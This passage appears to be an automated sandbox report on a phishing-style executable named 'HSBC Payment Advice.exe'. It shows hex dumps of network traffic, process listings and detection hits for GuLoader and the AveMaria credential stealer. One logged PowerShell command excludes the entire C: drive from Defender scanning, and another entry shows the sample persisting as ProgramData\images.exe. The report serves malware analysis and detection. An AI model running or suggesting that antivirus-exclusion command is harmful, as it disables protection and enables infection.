                  2021-11-25 17:53:01 UTC152INData Raw: 70 d7 9c d9 05 cc dc 90 e5 e9 3c 3f fc 42 7e 2d e3 ad 98 07 5d 41 c1 25 28 da 03 27 43 38 24 e3 25 37 66 bc df e5 36 4d 60 12 a2 b9 98 cc 72 b5 ca 27 2f 10 02 9b ac cf f8 34 65 14 8e 93 e2 33 ac e9 cb c9 fa 75 44 bb 47 8f 8c 93 03 3e c1 a9 76 d5 f4 59 41 df 4e a2 02 08 de 71 09 26 8d 3c 0f 56 02 6f 73 ca e3 d4 91 01 91 d8 ed 63 f7 80 bc 86 b1 f4 fe 70 60 89 3a 0b 69 40 2b 78 ae b9 14 17 40 d8 a8 06 93 12 a8 af 37 24 e9 37 a2 a1 26 ad b5 49 09 9b 64 df 00 71 64 8e ac 0a 70 b4 db 45 36 02 73 1f 80 7a e3 f6 26 11 29 d9 ea b2 ac f7 dc c2 98 91 64 45 59 a8 a0 3c b1 9e 5c 66 bd f4 2f 41 b1 e6 9d ea 5c 92 71 db b2 c7 fb 94 8b f2 cc 48 d3 4a fa 64 d8 54 6a 9e 1e 92 8b f2 d1 97 7f c8 b1 39 11 d8 d6 31 84 7b 9a ba ff 72 b0 7f c7 06 bf 81 90 d6 e8 2f 00 b7 fe 5c 6e
                  Data Ascii: p<?B~-]A%('C8$%7f6M`r'/4e3uDG>vYANq&<Voscp`:i@+x@7$7&IdqdpE6sz&)dEY<\f/A\qHJdTj91{r/\n
                  2021-11-25 17:53:01 UTC160INData Raw: a9 11 3b ae 10 c1 e1 ee 66 0c 6a 93 d0 1b 55 b0 fc ec 97 e4 29 ad 95 8c f3 bb 01 b4 26 79 cf ec 5e d8 f8 94 65 40 74 e1 6b b4 ad 5d cd 03 fc 7a f9 56 36 1d 0d 37 eb d7 05 36 d2 24 34 f3 4a 2d 4e 00 8a 7b 6d 9e d6 89 4b 55 00 46 e7 ea 57 51 59 c0 61 fb e6 06 b5 54 c3 a2 c5 1a da 79 8f 51 43 a9 3d fa f9 46 de 0a 6f 7d a2 f2 24 e7 6c 40 6e ae 10 19 a9 83 41 a6 ec 88 75 d8 ae ca 40 0e 17 07 66 ef 6c 7d e6 be fe b7 50 c7 b8 c4 35 24 43 9a de e7 55 29 f9 29 61 89 84 35 0b 6e e6 fb 99 5a f0 f8 08 fd 9f a5 4e 10 dc 6a 4e 5d e7 f9 16 e0 bc f9 07 33 dd 8c cf 29 c2 1c ea 0c 51 d6 be 16 25 8d ef b0 cf 02 f2 f8 38 50 01 9d c5 c8 9b f2 08 67 33 69 85 c5 7c 98 75 db 7d 5a 0a 1b 6e c0 9b c9 24 a9 38 78 d8 b2 11 08 90 89 b7 dd 2f 09 71 06 f2 1e fa 40 58 ff 16 c8 b2 9b bf
                  Data Ascii: ;fjU)&y^e@tk]zV676$4J-N{mKUFWQYaTyQC=Fo}$l@nAu@fl}P5$CU))a5nZNjN]3)Q%8Pg3i|u}Zn$8x/q@X
                  2021-11-25 17:53:01 UTC168INData Raw: d8 23 21 e6 c8 b7 07 48 af 42 10 c7 c5 fd 0e e6 6a 54 7c d6 8b e1 a9 6e 62 c8 f4 91 6d bd 4e 5c 73 a0 69 73 1c 2c 13 2b 18 3f 12 a0 26 6e 16 4c 51 51 1e 52 50 44 62 75 a7 16 ad 1b 14 ee ca 27 9d b5 8d 1c 27 c2 d3 0b 2f 2c 3b 82 d2 c6 2d ed a3 ee d7 b1 e8 dc 6c 27 90 54 60 e5 8f 33 98 d8 e9 73 af 06 a0 b5 89 1b 9f 53 af 36 0c 7d 0a 39 79 4d 9e 89 79 2b 41 23 94 4f a9 29 a0 d9 7c 1e f1 50 66 ff 60 6f 1f a2 f0 28 7b fd f7 cf f7 a0 fa 87 7c c4 1f d3 de 4b ed 16 5e a6 19 fd 9e f4 ea cb f5 9d e0 a7 4c 08 ac 6d 5a 44 51 91 99 bc d6 23 76 2d dd ae 05 4b 24 4d c9 9b 68 6f 27 41 56 54 78 f0 e8 f9 9f f5 99 aa c6 13 86 e6 62 ba 1e 96 b7 10 3b cf 89 26 b6 8a de f2 53 46 cb 72 06 2c 7b 8c 18 7d 6c c3 d1 3d 98 19 e5 59 49 5d e4 91 90 c7 2f 46 b8 97 1b c0 da 1e 72 01 b9
                  Data Ascii: #!HBjT|nbmN\sis,+?&nLQQRPDbu''/,;-l'T`3sS6}9yMy+A#O)|Pf`o({|K^LmZDQ#v-K$Mho'AVTxb;&SFr,{}l=YI]/Fr
                  2021-11-25 17:53:01 UTC176INData Raw: d6 64 26 ca a3 a0 0d 5a 8f b2 ae 27 8c c5 05 8f c3 b0 fa d8 55 05 52 22 07 f6 e3 64 47 f7 06 db a3 e6 87 b3 e1 48 30 35 85 64 28 c6 69 fb c3 27 37 6c ce 0e 03 61 27 91 5c ea 46 52 d7 16 a6 e4 5f 79 da 3d b1 b1 58 39 ce 49 79 74 b6 82 f1 6e 79 89 85 48 0f fb 85 db e4 21 88 d3 6b f9 f2 15 71 6e 14 7e 2d 73 6f d2 49 a5 f3 a7 ce 29 da 4b 0e e8 f6 0c b3 da b8 33 8d 7f c9 f8 12 43 3b cf 64 33 fc d0 fe 46 a9 c4 79 6c 74 da 6e e5 53 1b bf 14 eb ae 84 53 e0 ef b1 6e 3b 6e 67 1b 88 a7 ff b0 2c f4 c1 b0 44 be a7 dc fd f3 31 12 6e f4 42 e4 f1 d2 b3 b3 cc d6 2a 6c 06 c8 1b 6e eb ee 40 f4 7d 81 1e ab 28 7c 29 7b 28 6c 22 8b f8 32 81 f0 ea 44 14 cf 9f 67 c4 40 b6 ba bd cd d2 09 3c ee 7a cf ea dc e4 e1 66 6d e2 30 e4 76 ca 6e b6 91 6f 7b 5e f4 0d f5 88 84 5c bb c6 a2 63
                  Data Ascii: d&Z'UR"dGH05d(i'7la'\FR_y=X9IytnyH!kqn~-soI)K3C;d3FyltnSSn;ng,D1nB*ln@}(|){(l"2Dg@<zfm0vno{^\c
                  2021-11-25 17:53:01 UTC184INData Raw: ac 93 bf 10 a1 c4 c7 3e 3e de 2c e5 95 a7 82 60 9c f8 2c 83 ef 10 c7 af 04 0f 38 d3 ff 9c 81 bb 82 4e 7f ab 91 33 10 1f 24 6c c0 cc e4 49 eb e3 72 aa 25 e5 93 88 e9 83 c4 e4 b9 65 5c 8d 84 0d f3 84 1e fe c5 ab 92 1e 62 57 2a c2 73 99 3c 84 87 5c 8a 76 5b ac 74 3f 71 f1 b4 dc 3d e6 20 98 b4 ca 22 5f 18 ea 03 dd 3a 25 29 4c 6a e4 33 51 7d 47 37 83 6b 7e 45 67 dd a4 4b 3a e8 4c b5 f6 62 95 7b b2 2c 7b 3e 66 eb bc 65 4a 26 46 c9 ad 3f 6f 94 2e fd 20 90 31 4b ee e2 ed 69 3e 6a 03 1e a9 ff c0 29 ad dd 12 25 19 08 2a 32 94 7f 12 ca 88 8a 1d 17 85 22 bb c4 b1 00 7d 54 cf 5d f9 f0 1c dc 49 e6 87 65 f9 56 04 80 13 41 7f 5f 15 3d c2 5e 2b 38 9d 48 36 73 28 12 f4 5c 26 57 4b 9c 5d 9f 31 78 c8 85 5f 8b 22 a4 41 f5 41 d1 22 72 e8 cf fc a6 d7 98 9a cb 86 ab 28 f2 9d c1
                  Data Ascii: >>,`,8N3$lIr%e\bW*s<\v[t?q= "_:%)Lj3Q}G7k~EgK:Lb{,{>feJ&F?o. 1Ki>j)%*2"}T]IeVA_=^+8H6s(\&WK]1x_"AA"r(
                  2021-11-25 17:53:01 UTC191INData Raw: 26 9c df 06 0a a1 67 e4 0d 1d d7 87 c2 e5 38 80 fe f4 02 9e ef 1b 0c 17 7a 66 aa 22 23 db 32 eb 0d 2b a4 ad 62 4d 79 60 8d 79 dd 9e 54 14 0e 35 6f 31 bf 69 bf 73 07 76 22 2f 7e d2 2a 84 0d d0 e8 ff 43 f0 bf 6a 63 27 54 1b eb 37 b0 16 e1 c1 84 d1 6d 37 c2 41 e9 d6 4e a5 c7 7d b7 9a c7 44 ee 0c 61 5c a1 76 11 c5 26 be 66 0a 38 f4 61 39 6c a5 21 fd 85 1f 51 e3 e2 7f d5 e4 82 6b c6 cb 30 3b 9e 6b eb 39 da aa 41 cc 4f 92 01 71 46 38 58 a0 2d e0 d5 7d de 9e b8 0b 2c 5b 20 5f 35 0a dd a5 e7 fa cf 6e 7f 1c 57 c9 ae 70 04 09 70 eb 25 30 f2 d0 9f 1a 50 91 84 22 f0 ee 59 75 36 94 12 84 20 a9 76 d1 cf b4 12 e9 a5 7b 80 ff 10 6a d9 54 06 ff c7 f2 a2 bb 82 89 b0 46 b9 95 b3 e5 41 d7 bb d5 ac 95 df c8 da b9 69 b2 3c c3 cd 96 d8 3b 73 9e b5 03 2b 50 55 15 b6 72 ae 65 d6
                  Data Ascii: &g8zf"#2+bMy`yT5o1isv"/~*Cjc'T7m7AN}Da\v&f8a9l!Qk0;k9AOqF8X-},[ _5nWpp%0P"Yu6 v{jTFAi<;s+PUre
                  2021-11-25 17:53:01 UTC199INData Raw: f9 b4 c9 d9 86 12 23 04 4f a8 63 36 03 05 57 59 de d3 11 bf 75 03 8c 18 ff 3b b9 8d 89 36 dd 25 c7 a5 0d 72 56 e0 66 c9 ef 2e ce 07 68 06 a2 56 5f 62 81 85 6e 71 50 8e cd e5 aa b8 de e9 96 ba 71 20 c6 c3 bb a3 61 53 27 71 72 32 25 16 db 2b 78 64 b6 e0 36 74 97 43 e4 59 e3 05 98 56 ef c2 31 07 ca 09 db ab 9d 38 10 47 5e f8 b7 46 98 9d ce 8b 8b a0 b9 37 05 73 50 1e bb 50 8c 27 3c 97 8a a6 f2 9f fb 1c 5a 12 38 70 dc ed 61 a2 2b 5c 46 08 f4 59 3a aa ae 1e ff 7c 41 bc 5c d3 7f ba fb 49 8b 4f 7d 65 2a 2c 85 3b 5a 28 d9 c5 aa 43 60 ab e5 1d b4 78 3d c8 b3 f1 03 10 e0 91 e7 51 e6 7e e7 28 74 19 3c 50 14 31 cc f0 44 a0 27 e7 28 64 20 7a 45 a9 36 7f 0b 70 f5 e9 40 e2 b0 d7 11 2f 30 c5 b7 8c 44 92 99 cd 41 a5 d2 bc fc 6e 77 6e 3e ec f3 32 0f f9 39 2b 61 a5 2e f4 62
                  Data Ascii: #Oc6WYu;6%rVf.hV_bnqPq aS'qr2%+xd6tCYV18G^F7sPP'<Z8pa+\FY:|A\IO}e*,;Z(C`x=Q~(t<P1D'(d zE6p@/0DAnwn>29+a.b
                  2021-11-25 17:53:01 UTC207INData Raw: dc cb cb a9 51 75 3b 28 fa 24 25 b8 91 dd a7 e1 8d e6 9f 40 82 8c 98 4b 6b 8c 01 b5 37 ff 8e e3 ca a3 22 02 4d e3 d4 b2 b0 8a 8f 0b 75 9a d8 ab 5c ad 33 75 99 d8 a4 cd 35 aa b5 09 8c 7d 2e 2d 95 4e 0e d1 75 e2 ae f6 0f 39 61 02 0a f1 08 52 39 8a 41 70 70 01 0d 9c c1 d9 eb 66 da 04 c5 f1 99 31 ad 8e 9b 2e bf e8 35 83 8f 80 11 5d ce ee f3 bf 3c 1b 6c 25 5f e2 62 72 d2 8d e5 da 5b 85 77 1d 50 b3 04 c7 6c e5 8b ea 51 13 23 6b 26 e2 48 bd 47 2f d2 4b ec 76 eb 55 33 b9 d4 41 c9 d5 d2 6f ea 7b 3e 87 bc 2a 96 bd f0 ca e5 61 62 56 ec 66 05 d4 d1 32 fd e9 1f 0a 3a 0e 60 20 bb 46 17 3b 37 b5 e4 d9 bd 36 9a 05 72 cb 72 53 2f df 07 64 da 0b 18 59 2e 64 63 93 81 19 dd 6d f0 18 27 f8 b3 af a4 c8 be 64 a6 79 fe 9d 9e c7 5a bd 34 fb 37 06 18 83 3f 15 b9 dc 18 d9 84 71 87
                  Data Ascii: Qu;($%@Kk7"Mu\3u5}.-Nu9aR9Appf1.5]<l%_br[wPlQ#k&HG/KvU3Ao{>*abVf2:` F;76rrS/dY.dcm'dyZ47?q
                  2021-11-25 17:53:01 UTC215INData Raw: 10 b7 3a a8 1f 80 f8 23 64 21 6d 20 2a f3 30 db 66 15 d5 25 a9 0e 8e 36 13 3d d6 82 ac a1 86 24 ee 6f 0f 92 a9 66 e2 bd f0 81 a0 b7 0c 13 a0 59 37 fa b5 70 a1 d9 7c 5f 5e 79 13 c0 e9 2f 79 af 55 e2 e4 c5 cc 25 88 01 61 a2 1c 57 6c 9e 07 3b db 4c 7d 03 0b 69 6c 83 8f 4a f3 72 f2 08 12 9f b3 82 a5 e3 fd 10 e0 46 8c f8 f9 9b 5c ac 3b eb 01 4b 44 e7 50 62 b9 25 3f 9e e1 11 cb 15 23 d0 24 40 05 34 50 f6 49 0e af 36 74 7f a1 5f ca 8b d7 f6 b0 39 4e e8 a5 71 19 0e 0f 0a 53 9f 0a b9 02 9e f9 07 a4 57 36 c8 a2 c4 77 78 97 39 6d fa 3a 32 64 b1 f5 99 43 cb a7 37 6c f3 a0 61 60 4a 1a 09 12 5d 2f c7 15 26 68 8e 79 fb f3 0c d2 99 c0 de 4a 89 b7 67 82 8e c2 b7 99 20 f5 1a 00 d5 a1 ff c6 03 a6 9f 72 ff 59 1b 6c 4c 6f e5 f6 93 af bf 6b 6e 7c 01 90 1b 14 50 b3 ef e9 80 1a
                  Data Ascii: :#d!m *0f%6=$ofY7p|_^y/yU%aWl;L}ilJrF\;KDPb%?#$@4PI6t_9NqSW6wx9m:2dC7la`J]/&hyJg rYlLokn|P
                  2021-11-25 17:53:01 UTC223INData Raw: 59 56 0c 10 45 c6 90 ec 4b 4f b8 ae f5 0f d7 f6 30 17 27 c8 c5 05 78 9b 09 ac 60 93 3f 9f 10 e3 cc d5 93 f4 03 4f fe b8 20 12 c0 38 6d d1 0c 0f 52 fa f3 c6 75 b3 91 4f 5a 34 f2 f2 22 33 2d 20 25 7a 28 51 22 c9 50 3d 4e 17 a6 b7 96 db f8 96 72 e4 cf e3 ba 68 fa 2c a1 af bf c0 4a 01 bd 2b cf e8 9e 67 4a 8b 20 0e 55 62 44 d1 cf 83 e4 87 20 6e 61 41 9b 6c 2d 2e 8a b7 f6 18 23 f0 fd fa e4 d2 c2 22 79 c2 91 81 39 b2 ea a6 2a 9c 75 6d 5a 81 27 fa 54 ee ca 29 a5 3a bc af cd 01 d5 59 d1 c5 21 24 ab ec a7 7c fe bc fc 89 d4 ab 46 97 a1 28 23 06 7c 3c 23 e2 88 7a 1f 51 e5 d8 ea 4e d5 a8 80 03 5d de 82 ef 71 81 bc ab 97 86 7b 35 32 d8 db b6 bf 95 5a a2 b4 9f aa 44 b5 8d 12 9e 0e cc 0c fd fc 15 cb 07 d5 a5 b6 7b 9d 0b db 80 54 a0 e6 ab f2 2c d5 31 ac b1 7d 4a bc e1 43
                  Data Ascii: YVEKO0'x`?O 8mRuOZ4"3- %z(Q"P=Nrh,J+gJ UbD naAl-.#"y9*umZ'T):Y!$|F(#|<#zQN]q{52ZD{T,1}JC


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:18:48:50
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBC Payment Advice.exe"
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:18:49:51
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBC Payment Advice.exe"
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:18:50:50
                  Start date:25/11/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:powershell Add-MpPreference -ExclusionPath C:\
                  Imagebase:0x1110000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Start time:18:50:50
                  Start date:25/11/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff774ee0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:50:51
                  Start date:25/11/2021
                  Path:C:\ProgramData\images.exe
                  Wow64 process (32bit):true
                  Commandline:C:\ProgramData\images.exe
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 56%, Virustotal, Browse
                  • Detection: 20%, Metadefender, Browse
                  • Detection: 49%, ReversingLabs
                  Reputation:low

                  General

                  Start time:18:51:59
                  Start date:25/11/2021
                  Path:C:\ProgramData\images.exe
                  Wow64 process (32bit):true
                  Commandline:C:\ProgramData\images.exe
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >